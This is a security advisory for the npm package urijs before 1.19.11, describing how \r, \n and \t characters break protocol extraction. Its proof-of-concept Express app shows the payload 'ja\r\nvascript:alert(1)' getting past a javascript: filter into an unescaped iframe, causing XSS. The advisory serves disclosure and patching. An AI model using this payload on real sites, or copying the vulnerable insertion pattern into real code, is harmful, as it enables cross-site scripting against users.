OSV (Google): GHSA-3VJF-82FF-P4R3
History: Apr 06, 2022 - 12:01 a.m.

Incorrect protocol extraction via \r, \n and \t characters

Published: 2022-04-06 00:01:31 (source: Google, osv.dev)
20

EPSS: 0.001 (Low), percentile 29.9%

Carriage return (\r), line feed (\n) and tab (\t) characters in user-supplied URLs can lead to incorrect protocol extraction in the npm package urijs prior to version 1.19.11.

This can lead to XSS when the module is used to filter out malicious javascript: links before they are inserted into HTML or JavaScript, as in the following example:

// Vulnerable demonstration: urijs < 1.19.11 mis-extracts the protocol when the
// input contains \r, \n or \t, so the "javascript" check below is bypassed.
const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000

// User-controlled URL with a CRLF embedded inside the scheme. Browsers strip
// these characters, so the iframe still executes javascript:alert(1).
const input = "ja\r\nvascript:alert(1)"
const url = parse(input)

console.log(url)

app.get('/', (req, res) => {
 // urijs exposes the scheme through the protocol() accessor (without the
 // trailing colon); the vulnerable versions do not return "javascript" here.
 if (url.protocol() !== "javascript") {res.send("<iframe src=\'" + input + "\'>CLICK ME!</iframe>")}
})

app.listen(port, () => {
 console.log(`Example app listening on port ${port}`)
})
Affected package (CPE): name urijs, operator lt, version 1.19.11 (i.e. urijs < 1.19.11)

